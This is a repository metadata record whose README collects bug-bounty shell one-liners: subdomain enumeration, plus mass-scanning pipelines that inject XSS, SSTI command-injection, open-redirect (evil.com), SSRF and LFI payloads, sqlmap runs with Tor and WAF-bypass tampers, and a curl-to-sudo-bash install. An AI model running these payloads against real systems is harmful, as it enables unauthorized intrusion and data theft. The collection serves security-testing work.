{"id":15038288,"url":"https://github.com/0xpugal/one-liners","last_synced_at":"2026-01-27T01:31:43.870Z","repository":{"id":47595737,"uuid":"420421708","full_name":"0xPugal/One-Liners","owner":"0xPugal","description":"A collection of one-liners for bug bounty hunting.","archived":false,"fork":false,"pushed_at":"2025-01-21T11:10:46.000Z","size":114,"stargazers_count":1273,"open_issues_count":1,"forks_count":216,"subscribers_count":18,"default_branch":"master","last_synced_at":"2025-02-01T05:45:21.580Z","etag":null,"topics":["bug-bounty","bugbounty","enumeration","onliner-scripts","subdomain-enumeration"],"latest_commit_sha":null,"homepage":"https://github.com/0xPugal/One-Liners","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xPugal.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"lfx_crowdfunding":null,"polar":null,"buy_me_a_coffee":"0xpugal","custom":["https://www.paypal.me/litt1eb0y"]}},"created_at":"2021-10-23T13:33:59.000Z","updated_at":"2025-01-31T21:47:13.000Z","dependencies_parsed_at":"2024-02-02T16:44:06.749Z","dependency_job_id":"b398e78f-2ada-4200-be4f-8432510448f1","html_url":"https://github.com/0xPugal/One-Liners","commit_stats":null,"previous_names":["0xpugal/one-liners","0xpugazh/one-liners"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xPugal%2FOne-Liners","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xPugal%2FOne-Liners/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xPugal%2FOne-Liners/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xPugal%2FOne-Liners/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xPugal","download_url":"https://codeload.github.com/0xPugal/One-Liners/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245756230,"owners_count":20667122,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty","bugbounty","enumeration","onliner-scripts","subdomain-enumeration"],"created_at":"2024-09-24T20:37:49.956Z","updated_at":"2026-01-27T01:31:43.831Z","avatar_url":"https://github.com/0xPugal.png","language":null,"funding_links":["https://buymeacoffee.com/0xpugal","https://www.paypal.me/litt1eb0y"],"categories":[],"sub_categories":[],"readme":"# One-Liners for bug bounty\n\n###### Thanks to all who create these Awesome One Liners❤️\n----------------------\n![image](https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png)\n---------------------------\n## One Line recon using pd tools\n```\nsubfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt\n```\n# Subdomain Enumeration\n```\n## Juicy Subdomains\nsubfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1  | grep --color 'api\\|dev\\|stg\\|test\\|admin\\|demo\\|stage\\|pre\\|vpn'\n\n## from BufferOver.run\ncurl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u \n\n## from Riddler.io\n\ncurl -s \"https://riddler.io/search/exportcsv?q=pld:target.com\" | grep -Po \"(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u \n\n## from RedHunt Labs Recon API\ncurl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=\u003ctarget.com\u003e\u0026page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r\n\n## from nmap\nnmap --script hostmap-crtsh.nse target.com\n\n## from CertSpotter\ncurl -s \"https://api.certspotter.com/v1/issuances?domain=target.com\u0026include_subdomains=true\u0026expand=dns_names\" | jq .[].dns_names | grep -Po \"(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u\n\n## from Archive\ncurl -s \"http://web.archive.org/cdx/search/cdx?url=*.target.com/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | sed -e 's_https*://__' -e \"s/\\/.*//\" | sort -u\n\n## from JLDC\ncurl -s \"https://jldc.me/anubis/subdomains/target.com\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u\n\n## from crt.sh\ncurl -s \"https://crt.sh/?q=%25.target.com\u0026output=json\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u\n\n## from ThreatMiner\ncurl -s \"https://api.threatminer.org/v2/domain.php?q=target.com\u0026rt=5\" | jq -r '.results[]' |grep -o \"\\w.*target.com\" | sort -u\n\n## from Anubis\ncurl -s \"https://jldc.me/anubis/subdomains/target.com\" | jq -r '.' | grep -o \"\\w.*target.com\"\n\n## from ThreatCrowd\ncurl -s \"https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com\" | jq -r '.subdomains' | grep -o \"\\w.*target.com\"\n\n## from HackerTarget\ncurl -s \"https://api.hackertarget.com/hostsearch/?q=target.com\"\n\n## from AlienVault\ncurl -s \"https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100\u0026page=1\" | grep -o '\"hostname\": *\"[^\"]*' | sed 's/\"hostname\": \"//' | sort -u\n\n## from Censys\ncensys subdomains target.com\n\n## from subdomain center\ncurl \"https://api.subdomain.center/?domain=target.com\" | jq -r '.[]' | sort -u\n```\n--------\n## LFI:\n```\ncat targets.txt | (gau || hakrawler || waybackurls || katana) |  grep \"=\" |  dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr \"root:[x*]:0:0:\"\n```\n----------------------\n## Open Redirect:\n```\necho target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \\=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep \"http://evil.com\" \u0026\u0026 echo -e \"$host \\033[0;31mVulnerable\\n\" ;done\n```\n```\ncat subs.txt | (gau || hakrawler || waybackurls || katana) | grep \"=\" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'\n```\n-----------------------\n## SSRF:\n```\ncat urls.txt | grep \"=\" | qsreplace \"burpcollaborator_link\" \u003e\u003e tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr \n```\n----------------\n## XSS:\n### Knoxss mass hunting\n```\nfile=$1; key=\"API_KEY\"; while read line; do curl https://api.knoxss.pro -d target=$line -H \"X-API-KEY: $key\" -s | grep PoC; done \u003c $file\n```\n```\ncat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev \"\\.(jpeg|jpg|png|ico|gif|css|woff|svg)$\" | uro | grep =  | qsreplace \"\u003cimg src=x onerror=alert(1)\u003e\" | httpx -silent -nc -mc 200 -mr \"\u003cimg src=x onerror=alert(1)\u003e\"\n```\n```\ncat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep \"URL\" | cut -d '\"' -f2 | sort -u | dalfox pipe\n```\n```\necho target.com | (gau || hakrawler || waybackurls || katana) | grep '=' |qsreplace '\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e' | while read host do ; do curl -s --path-as-is --insecure \"$host\" | grep -qs \"\u003cscript\u003ealert(1)\u003c/script\u003e\" \u0026\u0026 echo \"$host \\033[0;31m\" Vulnerable;done\n```\n```\ncat urls.txt | grep \"=\" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht\n```\n```\ncat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl'\n```\n---------------------\n## Hidden Dirs:\n```\ndirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt\n```\n```\nffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json\n```\n## ffuf json to txt output\n```\ncat output.json | jq | grep -o '\"url\": \"http[^\"]*\"' | grep -o 'http[^\"]*' | anew out.txt\n\n```\n**Search for Sensitive files from Wayback**\n```\necho target.com | (gau || hakrawler || waybackurls || katana) | grep -color -E \".xls | \\\\. xml | \\\\.xlsx | \\\\.json | \\\\. pdf | \\\\.sql | \\\\. doc| \\\\.docx | \\\\. pptx| \\\\.txt| \\\\.zip| \\\\.tar.gz| \\\\.tgz| \\\\.bak| \\\\.7z| \\\\.rar\"\n```\n-------------------\n## SQLi:\n```\ncat subs.txt | (gau || hakrawler || katana || waybckurls) | grep \"=\" | dedupe | anew tmp-sqli.txt \u0026\u0026 sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs \u0026\u0026\nfor i in $(cat tmp-sqli.txt); do ghauri -u \"$i\" --level 3 --dbs --current-db --batch --confirm; done\n```\n***Bypass WAF using TOR***\n```\nsqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment\n```\n***find which host is vuln in output folder of sqlmap/ghauri***\n``root@bb:~/.local/share/sqlmap/output#``\n```\nfind -type f -name \"log\" -exec sh -c 'grep -q \"Parameter\" \"{}\" \u0026\u0026 echo \"{}: SQLi\"' \\;\n```\n----------------\n## CORS:\n```\necho target.com | (gau || hakrawler || waybackurls || katana) | while read url;do target=$(curl -s -I -H \"Origin: https://evil.com\" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on \"$url\";fi;done\n```\n---------------\n## Prototype Pollution:\n```\nsubfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt \u0026\u0026 sed 's/$/\\/?__proto__[testparam]=exploit\\//' alive.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n```\n-------------\n## JS Files:\n### Find JS Files:\n```\ncat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E \"\\.js\" | egrep -v \"\\.json|\\.jsp\" | anew js.txt\n```\n```\nwhile read -r url; do\n  if curl -s -o /dev/null -w \"%{http_code}\" \"$url\" | grep -q 200 \u0026\u0026 \\\n     curl -s -I \"$url\" | grep -iq 'Content-Type:.*\\(text/javascript\\|application/javascript\\)'; then\n    echo \"$url\"\n  fi\ndone \u003c urls.txt \u003e js.txt\n```\n### Hidden Params in JS:\n```\ncat subs.txt | (gau || hakrawler || waybackurls || katana) | sort -u | httpx -silent -threads 100 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo \"var [a-zA-Z0-9]+\" | sed -e 's,'var','\"$url\"?',g' -e 's/ //g' | grep -Eiv '\\.js$|([^.]+)\\.js|([^.]+)\\.js\\.[0-9]+$|([^.]+)\\.js[0-9]+$|([^.]+)\\.js[a-z][A-Z][0-9]+$' | sed 's/.*/\u0026=FUZZ/g'); echo -e \"\\e[1;33m$url\\e[1;32m$vars\";done\n```\n### Extract sensitive end-point in JS:\n```\ncat main.js | grep -oh \"\\\"\\/[a-zA-Z0-9_/?=\u0026]*\\\"\" | sed -e 's/^\"//' -e 's/\"$//' | sort -u\n```\n-------------------------\n### SSTI:\n```\nfor url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done\n```\n```\necho target.com | gau --subs --threads 200 | httpx -silent -mc 200 -nc | qsreplace “aaa%20%7C%7C%20id%3B%20x” \u003e fuzzing.txt \u0026\u0026 ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080\n```\n---------------------------\n## Scan IPs\n```\ncat my_ips.txt | xargs -L 100 shodan scan submit --wait 0\n```\n## Screenshots using Nuclei\n```\nnuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v\n```\n## SQLmap Tamper Scripts - WAF bypass\n```\nsqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent\n```\n## Shodan Cli\n```\nshodan search Ssl.cert.subject.CN:\"target.com\" --fields ip_str | anew ips.txt\n```\n### Ffuf.json to only ffuf-url.txt\n```\ncat ffuf.json | jq | grep \"url\" | sed 's/\"//g' | sed 's/url://g' | sed 's/^ *//' | sed 's/,//g'\n```\n## Update golang\n```\ncurl https://raw.githubusercontent.com/udhos/update-golang/master/update-golang.sh | sudo bash\n```\n\n## Censys CLI\n```\ncensys search \"target.com\" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+'\n```\n## Nmap cidr to ips.txt\n```\ncat cidr.txt | xargs -I @ sh -c 'nmap -v -sn @ | egrep -v \"host down\" | grep \"Nmap scan report for\" | sed 's/Nmap scan report for //g' | anew nmap-ips.txt'\n```\n### Xray urls scan\n```\nfor i in $(cat subs.txt); do ./xray_linux_amd64 ws --basic-crawler $i --plugins xss,sqldet,xxe,ssrf,cmd-injection,path-traversal --ho $(date +\"%T\").html ; done\n```  \n### grep only nuclei info\n```\nresult=$(sed -n 's/^\\([^ ]*\\) \\([^ ]*\\) \\([^ ]*\\) \\([^ ]*\\).*/\\1 \\2 \\3 \\4/p' file.txt)\necho \"$result\"\n```\n``[sqli-error-based:oracle] [http] [critical] https://test.com/en/events/e5?utm_source=test'\u0026utm_medium=FUZZ'``\n### Download js files\n```\n## curl\nmkdir -p js_files; while IFS= read -r url || [ -n \"$url\" ]; do filename=$(basename \"$url\"); echo \"Downloading $filename JS...\"; curl -sSL \"$url\" -o \"downloaded_js_files/$filename\"; done \u003c \"$1\"; echo \"Download complete.\"\n\n## wget\nsed -i 's/\\r//' js.txt \u0026\u0026 for i in $(cat js.txt); do wget \"$i\"; done\n```\n### Filter only html/xml content-types for xss\n```\ncat urls.txt | grep \"=\" | grep \"?\" | uro | httpx -ct -silent -nc | grep -i -E \"text/html|application/xhtml+xml|application/xml|text/xml|image/svg+xml\" | cut -d '[' -f 1 | anew xml_html.txt\n\n## using curl\nwhile read -r url; do\n  if curl -s -o /dev/null -w \"%{http_code}\" \"$url\" | grep -q 200 \u0026\u0026 \\\n     curl -s -I \"$url\" | grep -iq 'Content-Type:.*text/\\(html\\|xml\\)'; then\n    echo \"$url\"\n  fi\ndone \u003c urls.txt \u003e xml_html.txt\n```\n### Get favicon hash\n```\ncurl https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico | jq\n```\n\n### Build wordlists from a nuclei templates\n```\nfor i in `grep -R yaml | awk -F: '{print $1}'`; do cat $i | grep 'BaseURL}}/' | awk -F '{{BaseURL}}' '{print $2}' | sed 's/\"//g' | sed \"s/'//g\"; done\n```\n### To find dependency confusion(confused)\n```\n[ -f \"urls.txt\" ] \u0026\u0026 mkdir -p downloaded_json \u0026\u0026 while read -r url; do wget -q \"$url\" -O \"downloaded_json/$(basename \"$url\")\" \u0026\u0026 scan_output=$(confused -l npm \"downloaded_json/$(basename \"$url\")\") \u0026\u0026 echo \"$scan_output\" | grep -q \"Issues found\" \u0026\u0026 echo \"Vulnerability found in: $(basename \"$url\")\" || echo \"No vulnerability found in: $(basename \"$url\")\"; done \u003c \u003c(cat urls.txt)\n```\n### find params using x8\n```\nsubdomain -d target.com -silent -all -recursive | httpx -silent | sed -s 's/$/\\//' | xargs -I@ sh -c 'x8 -u @ -w parameters.txt -o output.txt'\n```\n### find reflected parameters for xss - [xss0r](https://raw.githubusercontent.com/xss0r/xssorRecon/refs/heads/main/reflection.py)\n```\npython3 reflection.py urls.txt | grep \"Reflection found\" | awk -F'[?\u0026]' '!seen[$2]++' | tee reflected.txt\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xpugal%2Fone-liners","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xpugal%2Fone-liners","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xpugal%2Fone-liners/lists"}